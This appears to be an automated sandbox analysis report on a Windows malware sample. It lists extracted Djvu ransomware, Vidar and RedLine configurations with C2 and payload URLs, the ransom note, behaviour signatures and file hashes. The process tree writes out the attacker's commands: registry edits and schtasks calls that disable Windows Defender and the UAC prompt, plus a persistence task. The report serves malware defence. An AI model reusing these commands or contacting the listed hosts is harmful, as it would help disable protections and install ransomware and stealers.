Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-10-2022 12:40

General

  • Target

    e920b3cefacdaaa68c981e56c4711707f72cb39c2731596bb431f1a38b30cf12.exe

  • Size

    145KB

  • MD5

    19c55f0dcba674f5fd5dc4971d38b3fe

  • SHA1

    cdec5e8150d0889d2bbb3bf4621eaa9e1a8fc260

  • SHA256

    e920b3cefacdaaa68c981e56c4711707f72cb39c2731596bb431f1a38b30cf12

  • SHA512

    86f7de808df813be5b1e58b9952dde6a2006ede6cdf5ee4fd3ed909d689dba86c9e351d0635ab3aff259e418de5c07a8fe36223a9a4ee2d0007fc474f68977b7

  • SSDEEP

    3072:Nlki5n6SZR0voADAcUkxbzorh7L+flGIA:IG62ADzhUrh7AGIA

Malware Config

Extracted

Family

djvu

C2

http://winnlinne.com/lancer/get.php

Attributes
  • extension

    .ofww

  • offline_id

    xkNzhkB1wvgoDI7Uo0HPNLY3qCuwoFpP7nlhlut1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://winnlinne.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-EWKSsSJiVn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0569Jhyjd

rsa_pubkey.plain

Extracted

Family

vidar

Version

54.7

Botnet

517

C2

https://t.me/trampapanam

https://nerdculture.de/@yoxhyp

Attributes
  • profile_id

    517

Extracted

Family

redline

Botnet

installi

C2

78.153.144.6:2510

Attributes
  • auth_value

    f7a95740dfddbaa1471d1ac4f63cb78e

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 7 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e920b3cefacdaaa68c981e56c4711707f72cb39c2731596bb431f1a38b30cf12.exe
    "C:\Users\Admin\AppData\Local\Temp\e920b3cefacdaaa68c981e56c4711707f72cb39c2731596bb431f1a38b30cf12.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3812
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\D0B2.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\D0B2.dll
      2⤵
      • Loads dropped DLL
      PID:2072
  • C:\Users\Admin\AppData\Local\Temp\D44D.exe
    C:\Users\Admin\AppData\Local\Temp\D44D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4128
    • C:\Users\Admin\AppData\Local\Temp\D44D.exe
      C:\Users\Admin\AppData\Local\Temp\D44D.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\1e705e03-28df-40ee-b664-0f67a0273758" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:3224
      • C:\Users\Admin\AppData\Local\Temp\D44D.exe
        "C:\Users\Admin\AppData\Local\Temp\D44D.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Users\Admin\AppData\Local\Temp\D44D.exe
          "C:\Users\Admin\AppData\Local\Temp\D44D.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Executes dropped EXE
          PID:1532
          • C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build2.exe
            "C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:3920
            • C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build2.exe
              "C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build2.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              PID:2388
          • C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build3.exe
            "C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build3.exe"
            5⤵
            • Executes dropped EXE
            PID:652
            • C:\Windows\SysWOW64\schtasks.exe
              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
              6⤵
              • Creates scheduled task(s)
              PID:4996
  • C:\Users\Admin\AppData\Local\Temp\DC0F.exe
    C:\Users\Admin\AppData\Local\Temp\DC0F.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3732
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1648
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C "wmic path win32_VideoController get name"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic path win32_VideoController get name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4964
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C "wmic cpu get name"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:164
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic cpu get name
        3⤵
          PID:2188
    • C:\Users\Admin\AppData\Local\Temp\EBEE.exe
      C:\Users\Admin\AppData\Local\Temp\EBEE.exe
      1⤵
      • Executes dropped EXE
      PID:4500
    • C:\Users\Admin\AppData\Local\Temp\EF5A.exe
      C:\Users\Admin\AppData\Local\Temp\EF5A.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Tqqcbghwdivfantidef.bat" "
        2⤵
          PID:4156
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
            3⤵
              PID:3924
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f
              3⤵
              • UAC bypass
              PID:4620
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:4972
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              3⤵
                PID:4856
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                3⤵
                  PID:5004
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  3⤵
                    PID:1696
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    3⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:1204
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                    3⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:492
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    3⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:1456
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                    3⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3048
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                    3⤵
                    • Modifies Windows Defender Real-time Protection settings
                    PID:3832
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                    3⤵
                      PID:1972
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                      3⤵
                        PID:1336
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:4784
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                          3⤵
                            PID:60
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                            3⤵
                              PID:2836
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                              3⤵
                                PID:5100
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                3⤵
                                  PID:2280
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                  3⤵
                                    PID:4648
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                    3⤵
                                      PID:3148
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                      3⤵
                                        PID:416
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                        3⤵
                                          PID:4592
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                          3⤵
                                            PID:4624
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                            3⤵
                                              PID:4516
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                              3⤵
                                              • Modifies registry class
                                              PID:4884
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                              3⤵
                                              • Modifies registry class
                                              PID:592
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                              3⤵
                                              • Modifies registry class
                                              PID:648
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                              3⤵
                                                PID:1176
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                3⤵
                                                  PID:3920
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                  3⤵
                                                    PID:212
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                    3⤵
                                                      PID:1800
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                      3⤵
                                                      • Modifies security service
                                                      PID:4984
                                                  • C:\Users\Admin\AppData\Local\Temp\EF5A.exe
                                                    C:\Users\Admin\AppData\Local\Temp\EF5A.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1084
                                                • C:\Windows\SysWOW64\explorer.exe
                                                  C:\Windows\SysWOW64\explorer.exe
                                                  1⤵
                                                  • Accesses Microsoft Outlook profiles
                                                  • outlook_office_path
                                                  • outlook_win_path
                                                  PID:2780
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe
                                                  1⤵
                                                    PID:3712
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:2972
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                      2⤵
                                                      • Creates scheduled task(s)
                                                      PID:1132

                                                  Network

                                                  MITRE ATT&CK Enterprise v6

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                    Filesize

                                                    2KB

                                                    MD5

                                                    5f0a548198075b4cd8c891c5c0f45e4c

                                                    SHA1

                                                    c3dd48a91f5a4dfbecd2a9e5802a8e5d8623aab6

                                                    SHA256

                                                    bcb8d4f0e605ffe557f9f3d23291e2212f39acfa1df9f24331a4075810555839

                                                    SHA512

                                                    8ade693197f9ca350f7c549312de77d70ef362dd3772a9ebb86c30dc7311d047bac0b9e1b517001b4e470271f7f181313f87eeae5b7a71ec5b7be5380525e22f

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                    Filesize

                                                    1KB

                                                    MD5

                                                    cb19ea31ccbd0203dd87e096916c57fa

                                                    SHA1

                                                    cab9da6765c414006fc24a26afe3d9faed3da46c

                                                    SHA256

                                                    f2c2e4c4cb0138ea54016a5b4e248a37f10c3ce22ad3ac85f8509a9692d0394b

                                                    SHA512

                                                    20b5e6d75aa6340e47bb723541ede1ca9a54b8df916e3b9ae6e27ae869dfd13605feb400e0c847974594e126b9852dcb1785f55fc93ba10abcdef93ef71f5b36

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                    Filesize

                                                    488B

                                                    MD5

                                                    2bc19ba32d1c436d03e944ddb2bf55d9

                                                    SHA1

                                                    7f1148d8a712a05af5e28648326e0e1b934a7423

                                                    SHA256

                                                    ca5c0412832c95879cb4a9af38e4f3c6f70963ccd9e20bbead3197ce444d6485

                                                    SHA512

                                                    757408263d2cc0e19388b395af06aad91d1e2ff14138e92ac95a9c0ccbf297f8da36d22c55189c00cbf3b5539abb3d942a4986b3b8ae6e06f92180538a30490d

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                    Filesize

                                                    482B

                                                    MD5

                                                    aaf49406b7bcd4d2a3870d0a1b37b678

                                                    SHA1

                                                    686c45254b1fe4d301b2323812c0c79ba9430089

                                                    SHA256

                                                    172c44cc7a26a40d1f70225e0e756fe32d17063c087e930fc699be50cf7a37ac

                                                    SHA512

                                                    5e4b5413169ae0d47acdc4845faf992feb121aaf18c8a05633a36b008d372193c6043309ca2c656975b48ac936b21db8d276774cf434c9a8caf9213f918c163b

                                                  • C:\Users\Admin\AppData\Local\1e705e03-28df-40ee-b664-0f67a0273758\D44D.exe
                                                    Filesize

                                                    804KB

                                                    MD5

                                                    882a96452e0073218ab82ebc8844281b

                                                    SHA1

                                                    e36ad67193b1e3175290d68284eea511d5bb2a17

                                                    SHA256

                                                    398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                    SHA512

                                                    e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EF5A.exe.log
                                                    Filesize

                                                    1KB

                                                    MD5

                                                    94783fcf58c98f5ea0b416f441ad15eb

                                                    SHA1

                                                    979a7c39c6a5dbed314bc41a22c4ccdca6db206b

                                                    SHA256

                                                    117df0a0e80abf166ef148863dd82ba9e75c05b38ed3979d048f5fcc848ef905

                                                    SHA512

                                                    9301306461cb978e91761b24b1d04339c2bff71771431987cd8dc373387c12feb81dbdbf272da1f7c045eade4ffff1976885ca705ca7cf9a40a6c4a7553aa06c

                                                  • C:\Users\Admin\AppData\Local\Temp\D0B2.dll
                                                    Filesize

                                                    1.9MB

                                                    MD5

                                                    67fdb82fdbc2b7c96197e1e7910221d5

                                                    SHA1

                                                    a04e893b5e681ec1dd4b4518704b1e8f4e3ea2d4

                                                    SHA256

                                                    8a914b14659e7c2346089fa7a6f43755d94cf89fd56de4c1a7f6aa60ab451a2e

                                                    SHA512

                                                    5ad03c8b6b9e242b84f85cc0a8637164d1a0aaa5dd1994a9f2d567de65beac2b19ba2533277eeb22c068122eb5fca45435799398fc0e3031384bffdeeb1078fc

                                                  • C:\Users\Admin\AppData\Local\Temp\D44D.exe
                                                    Filesize

                                                    804KB

                                                    MD5

                                                    882a96452e0073218ab82ebc8844281b

                                                    SHA1

                                                    e36ad67193b1e3175290d68284eea511d5bb2a17

                                                    SHA256

                                                    398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                    SHA512

                                                    e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                  • C:\Users\Admin\AppData\Local\Temp\D44D.exe
                                                    Filesize

                                                    804KB

                                                    MD5

                                                    882a96452e0073218ab82ebc8844281b

                                                    SHA1

                                                    e36ad67193b1e3175290d68284eea511d5bb2a17

                                                    SHA256

                                                    398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                    SHA512

                                                    e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                  • C:\Users\Admin\AppData\Local\Temp\D44D.exe
                                                    Filesize

                                                    804KB

                                                    MD5

                                                    882a96452e0073218ab82ebc8844281b

                                                    SHA1

                                                    e36ad67193b1e3175290d68284eea511d5bb2a17

                                                    SHA256

                                                    398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                    SHA512

                                                    e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                  • C:\Users\Admin\AppData\Local\Temp\D44D.exe
                                                    Filesize

                                                    804KB

                                                    MD5

                                                    882a96452e0073218ab82ebc8844281b

                                                    SHA1

                                                    e36ad67193b1e3175290d68284eea511d5bb2a17

                                                    SHA256

                                                    398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                    SHA512

                                                    e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                  • C:\Users\Admin\AppData\Local\Temp\D44D.exe
                                                    Filesize

                                                    804KB

                                                    MD5

                                                    882a96452e0073218ab82ebc8844281b

                                                    SHA1

                                                    e36ad67193b1e3175290d68284eea511d5bb2a17

                                                    SHA256

                                                    398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                    SHA512

                                                    e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                  • C:\Users\Admin\AppData\Local\Temp\DC0F.exe
                                                    Filesize

                                                    4.3MB

                                                    MD5

                                                    2f3ab25b4bc37d6f7458b51ad51d4d91

                                                    SHA1

                                                    21e6d68e83303c5b385c70dce3dc467399263a27

                                                    SHA256

                                                    8320c73583b7638cffdf3ba722a6b3fc76b9e8531127a1141157b45b231e0eab

                                                    SHA512

                                                    df141ff59de2a6495b7f4ad6e64ab21514efd125576ff54563eed1c807a5027773672a286290e8a9b472f5227ef730bc41b78a18ae2637371ced094e76d5424b

                                                  • C:\Users\Admin\AppData\Local\Temp\DC0F.exe
                                                    Filesize

                                                    4.3MB

                                                    MD5

                                                    2f3ab25b4bc37d6f7458b51ad51d4d91

                                                    SHA1

                                                    21e6d68e83303c5b385c70dce3dc467399263a27

                                                    SHA256

                                                    8320c73583b7638cffdf3ba722a6b3fc76b9e8531127a1141157b45b231e0eab

                                                    SHA512

                                                    df141ff59de2a6495b7f4ad6e64ab21514efd125576ff54563eed1c807a5027773672a286290e8a9b472f5227ef730bc41b78a18ae2637371ced094e76d5424b

                                                  • C:\Users\Admin\AppData\Local\Temp\EBEE.exe
                                                    Filesize

                                                    8.9MB

                                                    MD5

                                                    1a46061adcf713ccfa1769fd7ad89f37

                                                    SHA1

                                                    3d9a5074f4010250f8d27543190ae792fb3b7fcb

                                                    SHA256

                                                    ba9ed3944e8ec8bfa8140d6b737f7275a14041e54b8e635edc6f7b9d7b9d60b1

                                                    SHA512

                                                    5c20758cf5aac63bf575d49b963d9a0e4426026be869c31c2568184c2666752eb7dcb44f56e92f881083e655b6361b130dd3cff5a5bd7a998feaca1680ae2047

                                                  • C:\Users\Admin\AppData\Local\Temp\EBEE.exe
                                                    Filesize

                                                    8.9MB

                                                    MD5

                                                    1a46061adcf713ccfa1769fd7ad89f37

                                                    SHA1

                                                    3d9a5074f4010250f8d27543190ae792fb3b7fcb

                                                    SHA256

                                                    ba9ed3944e8ec8bfa8140d6b737f7275a14041e54b8e635edc6f7b9d7b9d60b1

                                                    SHA512

                                                    5c20758cf5aac63bf575d49b963d9a0e4426026be869c31c2568184c2666752eb7dcb44f56e92f881083e655b6361b130dd3cff5a5bd7a998feaca1680ae2047

                                                  • C:\Users\Admin\AppData\Local\Temp\EF5A.exe
                                                    Filesize

                                                    7KB

                                                    MD5

                                                    74f18f5604cdfab09becca9a0828dc27

                                                    SHA1

                                                    1665e43d868eca4d263d560711f28c814ae8dc3f

                                                    SHA256

                                                    3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                    SHA512

                                                    374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                  • C:\Users\Admin\AppData\Local\Temp\EF5A.exe
                                                    Filesize

                                                    7KB

                                                    MD5

                                                    74f18f5604cdfab09becca9a0828dc27

                                                    SHA1

                                                    1665e43d868eca4d263d560711f28c814ae8dc3f

                                                    SHA256

                                                    3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                    SHA512

                                                    374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                  • C:\Users\Admin\AppData\Local\Temp\EF5A.exe
                                                    Filesize

                                                    7KB

                                                    MD5

                                                    74f18f5604cdfab09becca9a0828dc27

                                                    SHA1

                                                    1665e43d868eca4d263d560711f28c814ae8dc3f

                                                    SHA256

                                                    3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                    SHA512

                                                    374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                  • C:\Users\Admin\AppData\Local\Temp\Tqqcbghwdivfantidef.bat
                                                    Filesize

                                                    4KB

                                                    MD5

                                                    248e51762a488609ddbf23e6a9f71ce4

                                                    SHA1

                                                    87a36b87bade46d0b0614b104152db7814808b21

                                                    SHA256

                                                    fc25f8a91c687d51e45cc7cddcab46a73032d8872407d8cb19041155e140a653

                                                    SHA512

                                                    76b7d51767cba0dec6c659270ff0bdbe29d2c66a7f4d6288bc884573452ba3f74ea6162d79ce4011df592bddafd0f42577af3c2acd2d5fb1b6826b9d09bfd0d0

                                                  • C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build2.exe
                                                    Filesize

                                                    418KB

                                                    MD5

                                                    bc47d3a0d4a74adc40b3a7035344becb

                                                    SHA1

                                                    dd80bbe70106b62ea58924173a364cc936a0b1f4

                                                    SHA256

                                                    06d1366df3628a010416384f7c77c493ac35f13ee05e010751708d681ebe5169

                                                    SHA512

                                                    4a4ef35c5fcbfc5a6b86dd6235f8b1b4f048ee5b5bd74fd9173a65cd450ec0f58fcf74f5fd2e58dd5dee486c0e41c2523cd6d7528d56fc2627fbdf8b598a29e4

                                                  • C:\Users\Admin\AppData\Local\bf9e92bf-9200-4bdc-8acb-6a1af7cd629d\build2.exe
                                                    Filesize

                                                    418KB

                                                    MD5

                                                    bc47d3a0d4a74adc40b3a7035344becb

                                                    SHA1

                                                    dd80bbe70106b62ea58924173a364cc936a0b1f4

                                                    SHA256

                                                    06d1366df3628a010416384f7c77c493ac35f13ee05e010751708d681ebe5169
